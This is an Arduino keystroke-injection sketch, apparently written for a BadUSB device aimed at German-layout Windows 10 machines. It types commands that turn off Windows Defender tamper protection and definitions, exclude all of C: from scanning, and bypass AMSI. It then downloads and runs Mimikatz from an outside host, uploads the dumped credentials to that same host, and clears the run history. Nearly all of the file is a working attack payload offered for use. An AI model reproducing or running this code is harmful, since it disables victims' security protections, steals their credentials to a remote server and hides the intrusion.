#include <Keyboard.h>
#define KEY_DELAY 50 //delay between keystrokes for slow computers

void disableTampering() {
  // Disable tamper protection with the Windows GUI on Windows 10
  // Tested on my Lenovo T420 running Windows 10 {VERSION}
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(700);

  Keyboard.println("windowsdefender:");
  delay(2800);

  // Viren- und Bedrohungsschutz
  Keyboard.press(KEY_RETURN);
  delay(KEY_DELAY);
  Keyboard.release(KEY_RETURN);
  delay(1200);

  // move down to Einstellungen verwalten
  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_RETURN);
  delay(KEY_DELAY);
  Keyboard.release(KEY_RETURN);
  delay(1200);

  // move down to Manipulationsschutz slider
  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(KEY_TAB);
  delay(KEY_RETURN);
  Keyboard.release(KEY_TAB);
  delay(KEY_DELAY);

  Keyboard.press(' ');
  delay(KEY_DELAY);
  Keyboard.release(' ');
  delay(1200);

  // yes do it with ALT+j
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('j');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(1000);

  // close window with alt f4
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(500);
}

void setup() {
  // Keyboard.begin();
  Keyboard.begin(KeyboardLayout_de_DE);
  //I recommend that you leave a short delay before start while prototyping.
  //It will will give you some time to reprogram a board before it starts typing.
  delay(15000);

  // normal program, only run it once at startup

  disableTampering();
  
  // Windows + R
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(700);

  // Start cmd as Administrator
  Keyboard.println("powershell Start-Process cmd -Verb runAs");
  delay(2500);

  // press ALT + j to confirm execution as Administrator
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press('j');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(1500);
  
  // If no UAC enabled, we printed j on the console, let's
  // initiate a few CTRL+C's to cancel that and get a fresh
  // prompt...
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press('c');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(200);

  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press('c');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(300);

  // Disable Defender; wait a bit longer, because recent only `ershell ...` was printed
  Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true");
  delay(200);

  // Start powershell; wait longer because the OS has to bring another window to foreground
  Keyboard.println("powershell");
  delay(200);

  // Add C: to Defender exclusion list
  Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\"");
  delay(200);

  Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\"");
  delay(200);
  Keyboard.println("exit");
  delay(2500);

  // Download and execute mimikatz; then upload result log
  Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\"");
  // Keyboard.println("IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)");
  delay(9000);

  // Clear run history
  Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
  // Keyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue");
  delay(400);

  // show wlan passwords
  // Keyboard.println("netsh wlan show profile key=clear");
  // delay(8000);

  // exit cmd window
  Keyboard.println("exit");
  delay(KEY_DELAY);

  Keyboard.end();
}

void loop() {
  // do nothing in loop() -- or should we restart the computer? or lock it? or delete something?
  // or start a fork bomb etc...
}